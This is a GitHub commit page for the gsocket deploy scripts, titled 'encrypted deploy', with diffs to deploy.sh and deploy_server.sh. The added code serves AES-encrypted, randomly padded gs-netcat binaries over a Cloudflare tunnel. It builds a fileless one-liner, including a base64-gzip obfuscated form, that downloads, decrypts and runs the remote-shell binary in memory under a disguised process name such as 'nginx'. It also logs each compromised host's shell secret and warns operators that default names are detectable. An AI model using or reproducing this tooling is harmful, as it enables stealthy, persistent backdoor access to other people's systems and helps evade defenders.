Skip to content

Commit

Permalink
encrypted deploy
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Dec 12, 2024
1 parent 1baff1d commit db8d211
Show file tree
Hide file tree
Showing 2 changed files with 112 additions and 52 deletions.
22 changes: 12 additions & 10 deletions deploy/deploy.sh
Original file line number Diff line number Diff line change
Expand Up @@ -97,15 +97,21 @@ IS_DEPLOY_SERVER=
URL_BASE=
DS_GS_HOST=
DS_GS_PORT=
DS_GS_BEACON=
DS_GS_NAME=
DS_GS_BIN=
gs_deploy_webhook=
GS_WEBHOOK_404_OK=
# -----END deploy_server.sh HOOK-----
[[ -n $URL_BASE ]] && [[ -z $GS_URL_BASE ]] && GS_URL_BASE="$URL_BASE"
[[ -n $IS_DEPLOY_SERVER ]] && unset GS_BRANCH
[ -z "$GS_HOST" ] && GS_HOST="$DS_GS_HOST"
[ -z "$GS_PORT" ] && GS_PORT="$DS_GS_PORT"
gs_deploy_webhook=
GS_WEBHOOK_404_OK=
[[ -n $gs_deploy_webhook ]] && GS_WEBHOOK="$gs_deploy_webhook"
unset gs_deploy_webhook
# -----END deploy_server.sh HOOK-----
[ -z "$GS_BEACON" ] && GS_BEACON="$DS_GS_BEACON"
[ -z "$GS_NAME" ] && GS_NAME="$DS_GS_NAME"
[ -z "$GS_BIN" ] && GS_BIN="$DS_GS_BIN"
[ -n "$gs_deploy_webhook" ] && GS_WEBHOOK="$gs_deploy_webhook"
unset gs_deploy_webhook DS_GS_HOST DS_GS_PORT DS_GS_BEACON DS_GS_NAME DS_GS_BIN

[[ -n $GS_URL_BASE ]] && {
URL_BASE_CDN="${GS_URL_BASE}"
Expand Down Expand Up @@ -2290,10 +2296,6 @@ gs_start
echo -e "--> ${CW}Join us - https://thc.org/ops${CN}"

# Default values are known and easily detected by users/admins.
unset is_warn
# [ "$UID" -eq 0 ] && [ -z "$GS_SERVICE" ] && is_warn=1
[ -z "$GS_BIN" ] && is_warn=1
[ -z "$GS_NAME" ] && is_warn=1
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
{ [ -z "$GS_BIN" ] || [ -z "$GS_NAME" ]; } && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."

exit_code 0
142 changes: 100 additions & 42 deletions deploy/deploy_server.sh
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,10 @@
# 2. Use your own Global Socket Relay Network
#
# To run this script type:
# export GS_PORT=
# export GS_HOST=
# export GS_BEACON=10
# export GS_NAME=foo
# bash -c "$(curl -fsSL https://gsocket.io/deploy/ys)"
# ---or---
# LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/deploy/ys)"
Expand Down Expand Up @@ -52,6 +56,7 @@ packages+=("openbsd-x86_64")
[[ -t 1 ]] && {
CY="\033[1;33m" # yellow
CDY="\033[0;33m" # yellow
CB="\033[1;34m" # blue
CG="\033[1;32m" # green
CDG="\033[0;32m" # green
CR="\033[1;31m" # red
Expand All @@ -65,8 +70,7 @@ packages+=("openbsd-x86_64")
CF="\e[2m" # faint
}

do_stop()
{
do_stop() {
local arr

[[ -f "cloudflare.pid" ]] && {
Expand All @@ -82,25 +86,28 @@ do_stop()
rm -f "${arr[@]}"
}

do_cleanup()
{
do_cleanup() {
rm -f "cloudflare.log" "www_err.log" &>/dev/null
}

ERREXIT()
{
ERREXIT() {
local code
code=$1
shift 1
[[ -n "$*" ]] && echo -e >&2 "$*"
exit "$code"
}


WARN() {
echo -e "--> ${CY}WARNING: ${CN}$*"
}

do_sigtrap()
{
do_stop
do_cleanup
echo -e "\nType ${CDC}rm -rf ${DATA_DIR_BRANCH}${LOG:+ $LOG}; rmdir ${DATA_DIR}${CN} to clean all files."
echo -e "\nType ${CDC}rm -rf .encpass ${DATA_DIR_BRANCH}${LOG:+ $LOG}; rmdir ${DATA_DIR}${CN} to clean all files."
exit 0
}

Expand Down Expand Up @@ -141,39 +148,70 @@ command -v python >/dev/null || {
}
"$PYTHON" -m http.server -h >/dev/null || ERREXIT 255 "Python -m http.server not found."

unset str
[ -z "$GS_HOST" ] && str+=$'\n'"export GS_HOST=<IPv4>"
[ -z "$GS_NAME" ] && str+=$'\n'"export GS_NAME=<process name>"
[ -z "$GS_BIN" ] && str+=$'\n'"export GS_BIN=<filename>"
[ -n "$str" ] && WARN "Using defaults is easily detectable. Try set:${CDC}${str}${CN}"
unset str

[[ ! -d "${DATA_DIR_BRANCH}/bin" ]] && mkdir -p "${DATA_DIR_BRANCH}/bin"
[[ ! -f "${DATA_DIR_BRANCH}/y" ]] && {
echo -e "Downloading ${CDY}${DEPLOY_SH_NAME}${CN} (e.g. deploy.sh)"
curl -fsSL "https://gsocket.io${URL_BRANCH}/y" --output "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
}

ENCPASS="$(cat .encpass 2>/dev/null)" || {
ENCPASS="$(head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16)"
[ -n "$ENCPASS" ] && {
IS_NEW_ENCPASS=1
echo "${ENCPASS}" >.encpass
}
}

# Create a temp session password
[ -n "$ENCPASS" ] && [ -z "$GS_SECRET" ] && GS_SECRET="$(head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 22)"
for n in "${packages[@]}"; do
[[ -f "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}" ]] && continue
echo -e "Downloading ${CDY}gs-netcat_mini-${n}${CN}..."
curl -fsSL "https://gsocket.io/${BINDIR}/gs-netcat_mini-${n}" --output "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
[[ ! -f "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}" ]] && {
echo -e "Downloading ${CDY}gs-netcat_mini-${n}${CN}..."
curl -fsSL "https://gsocket.io/${BINDIR}/gs-netcat_mini-${n}" --output "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
}
[ -z "$ENCPASS" ] && continue

fn="${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
[ -f "${fn}.enc" ] && [ -n "$IS_NEW_ENCPASS" ] && rm -f "${fn}.enc"
[ -f "${fn}.enc" ] && continue
# Increase size by 32*1024 .. 129*1024-1 bytes
(cat "$fn" && dd bs=1 count=$((32000 + 1024 * (RANDOM % 128) + RANDOM % 1024 )) if=/dev/urandom 2>/dev/null) | openssl enc -aes-256-cbc -pbkdf2 -k "$ENCPASS" >"${fn}.enc"
done

start "Cloudflare" "cloudflare.log" cloudflared tunnel --url "http://127.0.0.1:${PORT}" --no-autoupdate
start "www" "www_err.log" "$PYTHON" -m http.server --bind 127.0.0.1 --directory "${DATA_DIR}" "${PORT}"
i=0
while :; do
str=$(grep -E "https://.*trycloudflare.com" cloudflare.log | tail -n1 | cut -f2 -d'|' | sed 's/ //g')
[[ -n $str ]] && break
((i++))
[[ $i -gt 10 ]] && {
[ -n "$GS_URL_BASE" ] && URL_BASE="$GS_URL_BASE"

[ -z "$URL_BASE" ] && {
start "Cloudflare" "cloudflare.log" cloudflared tunnel --url "http://127.0.0.1:${PORT}" --no-autoupdate
start "www" "www_err.log" "$PYTHON" -m http.server --bind 127.0.0.1 --directory "${DATA_DIR}" "${PORT}"
i=0
while :; do
str=$(grep -E "https://.*trycloudflare.com" cloudflare.log | tail -n1 | cut -f2 -d'|' | sed 's/ //g')
[[ -n $str ]] && break
((i++))
[[ $i -gt 10 ]] && {
do_stop
ERREXIT 255 "Could not get cloudflare tunnel. See cloudflare.log for details."
}
sleep 1
done

str="${str:8}" # cut of https://
str="${str//[^[:alnum:]].-}" # sanitize
[[ -z $str ]] && {
do_stop
ERREXIT 255 "Could not get cloudflare tunnel. See cloudflare.log for details."
ERREXIT 255 "Could not get CF URL. See cloudflare.log for details"
}
sleep 1
done

str="${str:8}" # cut of https://
str="${str//[^[:alnum:]].-}" # sanitize
[[ -z $str ]] && {
do_stop
ERREXIT 255 "Could not get CF URL. See cloudflare.log for details"
URL_BASE="https://${str}"
}
URL_BASE="https://${str}"
# URL_BASE='https://gsocket.io'
[ -z "$URL_BASE" ] && ERREXIT 255 "Cant create cloudflare tunnel. Please set ${CDC}URL_BASE='<This Host>'"

# update deploy.sh
sed "s|^URL_BASE=.*|URL_BASE=\"${URL_BASE}\"|" -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
Expand All @@ -182,6 +220,13 @@ sed "s|^gs_deploy_webhook=.*|gs_deploy_webhook='${URL_BASE}/results.php?s=\${GS_
sed 's|^GS_WEBHOOK_404_OK=.*|GS_WEBHOOK_404_OK=1|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_HOST" ] && sed 's|^DS_GS_HOST=.*|DS_GS_HOST='"'$GS_HOST'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_PORT" ] && sed 's|^DS_GS_PORT=.*|DS_GS_PORT='"'$GS_PORT'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_BEACON" ] && sed 's|^DS_GS_BEACON=.*|DS_GS_BEACON='"'$GS_BEACON'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_NAME" ] && sed 's|^DS_GS_NAME=.*|DS_GS_NAME='"'$GS_NAME'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_BIN" ] && sed 's|^DS_GS_BIN=.*|DS_GS_BIN='"'$GS_BIN'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"

# memexec string:
MEMCMD="X=\"\$(head -c64</dev/urandom|base64|tr -dc [:alnum:]|head -c22)\" && curl -SskfL \"${URL_BASE:-https://BAD}${URL_BRANCH}/bin/gs-netcat_mini-linux-\$(uname -m).enc?s=\$X\"|openssl enc -d -aes-256-cbc -pbkdf2 -k ${ENCPASS}|GS_NOFFPID=1 GS_ARGS=\"-ilD -s\${X}\"${GS_BEACON:+ GS_BEACON=$GS_BEACON}${GS_HOST:+ GS_HOST=$GS_HOST}${GS_PORT:+ GS_PORT=$GS_PORT} perl '"'-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}'"${GS_NAME:-nginx}"',@ARGV'"'"
MEMCMD64="$(gzip<<<"${MEMCMD}" | base64 -w0)"

echo -e "${CDG}SUCCESS${CN}"
[ -n "$GS_HOST" ] && echo -e "--> ${CDG}GS_HOST='$GS_HOST'${CN}"
Expand All @@ -190,21 +235,34 @@ echo -e "${CDY}To log via Telegram, Discord or webhook.site please edit
${CW}$(realpath "$(pwd)/${DATA_DIR_BRANCH}/y")${CDY} and set${CN}
1. ${CDC}GS_TG_TOKEN=${CN}, ${CDC}GS_TG_CHATID=${CN} OR ${CDC}GS_DISCORD_KEY=${CN} OR ${CDC}GS_WEBHOOK_KEY=${CN}
To deploy gsocket:
${CM}bash -c \"\$(curl -fsSL ${URL_BASE}${URL_BRANCH}/y)\"${CN}
${CM}bash -c \"\$(wget --no-verbose -O- ${URL_BASE}${URL_BRANCH}/y)\"${CN}
Press CTRL-C to stop
${CDG}-----SUCCESSFUL DEPLOYMENTS ARE SHOWN BELOW-----${CN}"
1. ${CM}bash -c \"\$(curl -fsSL ${URL_BASE}${URL_BRANCH}/y)\"${CN}
2. ${CM}bash -c \"\$(wget --no-verbose -O- ${URL_BASE}${URL_BRANCH}/y)\"${CN}"
echo -e "\
Start gsocket in memory only, without installing - use one of these commands: ${CF}(Linux only)${CN}
1. ${CDM}${MEMCMD};echo \$X${CN}
2. ${CDM}echo '${MEMCMD64}'|base64 -d|gunzip|sh${CN}"

# a dirty hack to retrieve results: The deploy scripts requests an
# non-existing PATH/$SECRET and we retrieve it from the error log.
tail -f www_err.log | while read -r str; do
str="${str//[^[:alnum:] \/:.&=?]/}" # sanitize
str="${str##*GET \/results.php?s=}"
str="${str%% *}"
str="${str//[^[:alnum:]]/}" # sanitize
[[ ${#str} -ne 22 ]] && continue
d="$(date -u)"
echo -e "[${CDG}${d}${CN}] ${CDC}gs-netcat -i -s '${CC}${str}${CDC}'${CN}"
[[ -n $LOG ]] && echo -e "[${d}] gs-netcat -i -s '${str}'" >>"${LOG}"
done

if [ -e www_err.log ]; then
echo -e "Press CTRL-C to stop"
echo -e "${CDG}-----SUCCESSFUL DEPLOYMENTS ARE SHOWN BELOW-----${CN}"
tail -f www_err.log 2>/dev/null | while read -r str; do
str="${str//[^[:alnum:] \/:.&=?]/}" # sanitize
str="${str##*\?s=}"
str="${str%% *}"
str="${str//[^[:alnum:]]/}" # sanitize
[[ ${#str} -ne 22 ]] && continue
d="$(date -u)"
echo -e "[${CDG}${d}${CN}]${CDC}${GS_HOST:+ GS_HOST=$GS_HOST}${GS_PORT:+ GS_PORT=$GS_PORT} gs-netcat -i${GS_BEACON:+w} -s '${CC}${str}${CDC}'${CN}"
[[ -n $LOG ]] && echo -e "[${d}] gs-netcat -i -s '${str}'" >>"${LOG}"
done
else
echo -e "${CDR}Not found: www_err.log${CN}
--> ${CDY}Installs wont get logged. Check if GS_URL_BASE= is set and logs to www_err.log.${CN}"
echo -e "Press CTRL-C to stop"
sleep infinity
fi

do_sigtrap

0 comments on commit db8d211

Please sign in to comment.